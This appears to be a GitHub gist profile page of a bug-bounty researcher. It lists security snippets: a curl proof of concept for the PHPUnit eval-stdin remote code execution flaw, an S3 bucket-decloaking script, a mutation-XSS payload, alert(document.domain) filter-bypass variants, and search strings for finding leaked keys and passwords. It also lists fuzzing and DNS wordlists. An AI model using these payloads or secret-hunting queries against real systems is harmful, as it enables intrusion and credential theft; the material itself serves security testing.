Skip to content

Instantly share code, notes, and snippets.

View yassineaboukir's full-sized avatar
🐐
I've goat this!

Yassine ABOUKIR yassineaboukir

🐐
I've goat this!
View GitHub Profile
@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active March 27, 2024 07:26
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@yassineaboukir
yassineaboukir / gist:1501de6f60dce148824d3001e83fb263
Created September 10, 2020 11:17
PHPunit RCE PoC (CVE-2017-9841)
$ curl --data "<?php echo(pi());" http://localhost:8888/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Source: http://web.archive.org/web/20170701212357/http://phpunit.vulnbusters.com/
@yassineaboukir
yassineaboukir / bucket-disclose.sh
Created October 5, 2021 16:55 — forked from fransr/bucket-disclose.sh
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
swagger: '2.0'
info:
title: Classic API Resource Documentation
description: |
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=console.log('XSS-PoC-by-@yassineaboukir') src=1>"></form>
version: production
basePath: /JSSResource/
produces:
- application/xml
@yassineaboukir
yassineaboukir / git-remove.sh
Created May 31, 2019 15:14
remove .git files recursively
( find . -type d -name ".git" \
&& find . -name ".gitignore" \
&& find . -name ".gitmodules" ) | xargs rm -rf
@yassineaboukir
yassineaboukir / gist:726992bd1f0a4eb637d150b7b5c66079
Last active December 7, 2022 16:09
List of reserved names to blacklist from registration/username claim for security reasons and RFC compliance
abuse
admin
administrator
ftp
hostmaster
info
is
it
list
list-request
“Hackme.tld” API_key
“Hackme.tld” secret_key
“Hackme.tld” aws_key
“Hackme.tld” Password 
“Hackme.tld” FTP
“Hackme.tld” login
“Hackme.tld” github_token
“Hackme.tld” http:// & https://  
“Hackme.tld” amazonaws
“Hackme.tld” digitaloceanspaces
@yassineaboukir
yassineaboukir / all.txt
Created February 15, 2020 09:04 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@yassineaboukir
yassineaboukir / alert.js
Created March 24, 2021 14:08 — forked from tomnomnom/alert.js
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@yassineaboukir
yassineaboukir / Electron app decompiling
Created June 12, 2019 01:10
Obtain the source code of Electron applications
# Open terminal and install asar node module globally
$ npm install -g asar
# Go into the app’s directory, in our case it’s Slack
$ cd /Applications/Slack.app/Contents/Resources
# Create a directory to paste the content of app